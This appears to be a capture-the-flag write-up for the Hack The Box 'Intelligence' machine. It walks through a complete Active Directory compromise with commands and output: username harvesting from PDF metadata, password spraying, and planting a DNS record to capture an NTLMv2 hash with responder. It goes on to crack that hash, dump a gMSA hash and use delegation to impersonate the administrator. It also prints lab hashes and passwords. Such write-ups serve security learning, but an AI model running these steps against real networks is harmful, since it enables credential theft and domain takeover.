Intelligence - Medium

Introduction@Intelligence:~$
Enumeration
Nmap
# Nmap 7.92 scan initiated Thu Sep 23 15:19:45 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.35s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-23 16:05:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h15m00s, deviation: 0s, median: 7h15m00s
| smb2-time:
| date: 2021-09-23T16:06:11
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 23 15:21:50 2021 -- 1 IP address (1 host up) scanned in 125.17 seconds
Nmap show a lot of services running on the machine, LDAP , Kerberos, HTTP, SMB and others. We also have hostname
and virtual host
in the nmap output. Add them to /etc/hosts
file.
Web Enumeration

There are two pdf to download. Inside both files are not interesting but if we lookup meta
data of the two file, we can see creator name.

Save in a file and let's check these two user are valid or not.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ cat users
William.Lee
Jose.Williams
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ ./kerbrute_linux_amd64 userenum users -d intelligence.htb --dc intelligence.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/27/21 - Ronnie Flathers @ropnop
2021/11/27 10:53:09 > Using KDC(s):
2021/11/27 10:53:09 > intelligence.htb:88
2021/11/27 10:53:10 > [+] VALID USERNAME: William.Lee@intelligence.htb
2021/11/27 10:53:10 > [+] VALID USERNAME: Jose.Williams@intelligence.htb
2021/11/27 10:53:10 > Done! Tested 2 usernames (2 valid) in 0.337 seconds
Both accounts are valid. Now try to query the domain for users with Do not require Kerberos pre-authentication
set and export their TGTs for cracking.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py intelligence.htb/ -usersfile users
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
Both accounts have not set to Do not require pre-auth
. This mean, we can't perform Kerberoasting attack, it requires a user with Pre-Authentication enabled.
Now look at the name of PDF files, we can see a pattern. 2020-01-01-upload.pdf
It's just a date and we can generate list of dates and bruteforce for other pdf files.
Getting PDF Files
generate_dates.sh
#!/bin/bash
start=2020-1-2
end=2022-01-01
while ! [[ $start > $end ]]; do
echo $start
start=$(date -d "$start + 1 day" +%F)
done
This script can generate dates 2020 to 2022. Now we need to concat that dates with -upload.pdf
and save in a file named as file_name.txt
./generate_date.sh > dates.txt && cat dates.txt | while read line; do echo ${line}$string-upload.pdf; done > file_name.txt
file_name.txt output
2020-1-2-upload.pdf
2020-01-03-upload.pdf
2020-01-04-upload.pdf
2020-01-05-upload.pdf
2020-01-06-upload.pdf
2020-01-07-upload.pdf
---[snip]---
The next step is to bruteforce with that file using ffuf
to know which pdf file is exists.
└──╼ [??]$ ffuf -w file_name.txt -mc 200 -u http://intelligence.htb/documents/FUZZ -s -o output -of md
2020-01-23-upload.pdf
2020-01-20-upload.pdf
2020-01-22-upload.pdf
2020-02-17-upload.pdf
2020-02-28-upload.pdf
---[snip]---
I used markdown format as output because we can grep
easily that format with awk
command. You can see ouput in below.
└──╼ [??]$ cat output
# FFUF Report
Command line : `ffuf -w file_name.txt -mc 200 -u http://intelligence.htb/documents/FUZZ -s -o output -of md`
Time: 2021-11-27T11:57:15+06:30
| FUZZ | URL | Redirectlocation | Position | Status Code | Content Length | Content Words | Content Lines | Content Type | ResultFile |
| :- | :-- | :--------------- | :---- | :------- | :---------- | :------------- | :------------ | :--------- | :----------- |
| 2020-01-23-upload.pdf | http://intelligence.htb/documents/2020-01-23-upload.pdf | | 22 | 200 | 11557 | 167 | 136 | application/pdf | |
| 2020-01-20-upload.pdf | http://intelligence.htb/documents/2020-01-20-upload.pdf | | 19 | 200 | 11632 | 157 | 127 | application/pdf | |
| 2020-01-22-upload.pdf | http://intelligence.htb/documents/2020-01-22-upload.pdf | | 21 | 200 | 28637 | 236 | 224 | application/pdf | |
| 2020-02-17-upload.pdf | http://intelligence.htb/documents/2020-02-17-upload.pdf | | 47 | 200 | 11228 | 167 | 132 | application/pdf | |
| 2020-02-28-upload.pdf | http://intelligence.htb/documents/2020-02-28-upload.pdf | | 58 | 200 | 11543 | 167 | 131 | application/pdf | |
| 2020-01-25-upload.pdf | http://intelligence.htb/documents/2020-01-25-upload.pdf | | 24 | 200 | 26252 | 225 | 193 | application/pdf | |
| 2020-02-11-upload.pdf | http://intelligence.htb/documents/2020-02-11-upload.pdf | | 41 | 200 | 25245 | 241 | 198 | application/pdf | |
We only need the urls from the forth field, I used awk
to grep that urls and saved in a file.
└──╼ [??]$ cat output | awk '{print $4}' > urls.txt
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ cat urls.txt
http://intelligence.htb/documents/2020-01-23-upload.pdf
http://intelligence.htb/documents/2020-01-20-upload.pdf
http://intelligence.htb/documents/2020-01-22-upload.pdf
http://intelligence.htb/documents/2020-02-17-upload.pdf
http://intelligence.htb/documents/2020-02-28-upload.pdf
---[snip]---
Now we can use wget
to download all pdf in urls file.
wget -i urls.txt -q

Now we get all the pdf and let's grep
the creators name for all pdf.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ exiftool *.pdf | grep 'Creator' | awk '{print $3}' | sort -u
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
---[snip]---
Save all username in a file and check again which users are valid.
./kerbrute_linux_amd64 userenum users.txt -d intelligence.htb --dc intelligence.htb

All 30 accounts are valid.I checked which account is set Do not require Kerberos pre-authentication
but unfortunately even one account is not set.
Enumerating in PDF
When I grep some password in pdf, I see this.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ pdfgrep "pass" *.pdf
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.

In another pdf, I also found this

It tell us about a script which is placed by Ted
user. They are in the process of locking down in service accounts.
Now we have the password and multiple user. We should try to perform Password Spraying
attack on all users with the new password we got.
crackmapexec smb intelligence.htb -u users.txt -p 'NewIntelligenceCorpUser9876' --shares

We got one user valid with that password and we can also access shared folder of that user.
smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Mon Apr 19 07:50:26 2021
.. DR 0 Mon Apr 19 07:50:26 2021
Administrator D 0 Mon Apr 19 06:48:39 2021
All Users DHSrn 0 Sat Sep 15 13:51:46 2018
Default DHR 0 Mon Apr 19 08:47:40 2021
Default User DHSrn 0 Sat Sep 15 13:51:46 2018
desktop.ini AHS 174 Sat Sep 15 13:41:27 2018
Public DR 0 Mon Apr 19 06:48:39 2021
Ted.Graves D 0 Mon Apr 19 07:50:26 2021
Tiffany.Molina D 0 Mon Apr 19 07:21:46 2021
3770367 blocks of size 4096. 1390125 blocks available
smb: \>
In Tiffany’s directory we can find the user flag.
smb: \Tiffany.Molina\Desktop\> more user.txt
cc107e8830f*********f6f1e4795d69a6b
Privilege Escalation
In IT
share folder
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 19 07:20:55 2021
.. D 0 Mon Apr 19 07:20:55 2021
downdetector.ps1 A 1046 Mon Apr 19 07:20:55 2021
get
3770367 blocks of size 4096. 1390093 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>
We will get a powershell file
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
It look like kind of cronjob
running every 5min. It check for DNS records locally and if any of these records start with web
then it will request the DNS record via HTTP request using current user’s credentials (probably Ted). If the response code is not 200 (OK) then it will send an email to Ted user mentioning that the host (DNS) is down.
If we map a DNS record to our own host (IP) and when the HTTP request is made to check the status of the DNS then we will receive a request (because our IP is mapped with that DNS) and in turn then we can send NTLM authentication request back to the IP address.So if we can add a dns in the record we can get the Ted.Graves hash using responder.
To add a DNS record we will use dnstool.py
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/krbrelayx]
└──╼ [??]$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d 10.10.14.35 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/sheinn101/htb/intelligence/writeup/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
Now our DNS is in record. Run responder and wait about 5 min, we will get Ted.Graves hash in responder.
sudo responder -I tun0 -A

[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:9b02c16f450e2d04:3EC5029EFAF4F6A9549E1373517E9FB8:0101000000000000AC62D441C8E3D7012544620B7670C8A90000000002000800520054003300520001001E00570049004E002D00350046003500520037005600450047005300340045000400140052005400330052002E004C004F00430041004C0003003400570049004E002D00350046003500520037005600450047005300340045002E0052005400330052002E004C004F00430041004C000500140052005400330052002E004C004F00430041004C0008003000300000000000000000000000002000009161CE8EA47C7454AD3A3E579DFD855C95ABEF4724213C1E2E924695B8E76A8B0A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006F006F00700073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
Now we get the hash and crack with john
.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/krbrelayx]
└──╼ [??]$ john hash --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:09 DONE (2021-11-27 18:29) 0.1075g/s 1162Kp/s 1162Kc/s 1162KC/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
We got the password of Ted
user. Now we can try the gMSADumper to read the password of svc_int
(service account).
└──╼ [??]$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::b98d4cef68f72a98dfeed732d1b1abca
Now we have the hash, I tried to crack to get the password but unfortunately I didn't get anything.
Getting Silver Ticket
Let’s use pass the hash
technique to impersonate administrator and get the silver ticket. To generate silver ticket we need one more thing, that is SPN (Service Principle Name).
SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.
We will use bloodhound tool to dump AD environment to find the SPN.
┌─[sheinn101@parrot]─[/opt/BloodHound.py]
└──╼ [??]$ python3 bloodhound.py -u Ted.Graves -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c All
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS query name does not exist: svc_int.intelligence.htb.
INFO: Done in 01M 24S
It dump all the information in json
format. We are looking for SPN, it should have in computers.json file.
└──╼ [??]$ cat 20211127184623_computers.json | json
{
"computers": [
{
"ObjectIdentifier": "S-1-5-21-4210132550-3389855604-3437519686-1144",
"AllowedToAct": [],
"PrimaryGroupSid": "S-1-5-21-4210132550-3389855604-3437519686-515",
"LocalAdmins": [],
"PSRemoteUsers": [],
"Properties": {
"name": "SVC_INT.INTELLIGENCE.HTB",
"objectid": "S-1-5-21-4210132550-3389855604-3437519686-1144",
"domain": "INTELLIGENCE.HTB",
"highvalue": false,
"distinguishedname": "CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb",
"unconstraineddelegation": false,
"enabled": true,
"haslaps": false,
"lastlogontimestamp": -1,
"pwdlastset": 1638043891,
"serviceprincipalnames": [],
"description": null,
"operatingsystem": null,
"allowedtodelegate": [
"WWW/dc.intelligence.htb"
]
},
As you can see the last line, svc_int
is allowed to delegate with WWW/dc.intelligence.htb
. Now we can able to get the silver ticket.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/getST.py -hashes :b98d4cef68f72a98dfeed732d1b1abca -spn WWW/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int$
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
We get an error because TGT’s are time constraint. We need to match our time with servers time.
sudo ntpdate 10.10.10.248
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/getST.py -hashes :b98d4cef68f72a98dfeed732d1b1abca -spn WWW/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int$
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccach
We got the silver ticket and it is saved in current directory.
export KRB5CCNAME=`pwd`/administrator.ccache
Export the saved ticket, so that Kerberos clients can use it.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/smbclient.py intelligence.htb/administrator@dc.intelligence.htb -no-pass -k
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# who
host: \\10.10.14.35, user: administrator, active: 3, idle: 0
# shares
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
# use Users
# ls
drw-rw-rw- 0 Mon Apr 19 07:50:26 2021 .
drw-rw-rw- 0 Mon Apr 19 07:50:26 2021 ..
drw-rw-rw- 0 Mon Apr 19 06:48:39 2021 Administrator
drw-rw-rw- 0 Mon Apr 19 09:46:30 2021 All Users
drw-rw-rw- 0 Mon Apr 19 08:47:40 2021 Default
drw-rw-rw- 0 Mon Apr 19 09:46:30 2021 Default User
-rw-rw-rw- 174 Mon Apr 19 09:45:17 2021 desktop.ini
drw-rw-rw- 0 Mon Apr 19 06:48:39 2021 Public
drw-rw-rw- 0 Mon Apr 19 07:50:26 2021 Ted.Graves
drw-rw-rw- 0 Mon Apr 19 07:21:46 2021 Tiffany.Molina
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Mon Apr 19 07:21:57 2021 .
drw-rw-rw- 0 Mon Apr 19 07:21:57 2021 ..
-rw-rw-rw- 282 Mon Apr 19 07:10:10 2021 desktop.ini
-rw-rw-rw- 34 Sat Nov 27 13:07:38 2021 root.txt
# get root.txt
# exit
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ ls
2020-01-01-upload.pdf 2020-12-15-upload.pdf administrator.ccache kerbrute_linux_amd64 krbrelayx pdf root.txt users
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ cat root.txt
bf3bbe85e74********02d3aea9ed5b57
Now we pwned it.

Resource
https://github.com/dirkjanm/krbrelayx
https://adsecurity.org/?p=2011
https://github.com/micahvandeusen/gMSADumper
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
Last updated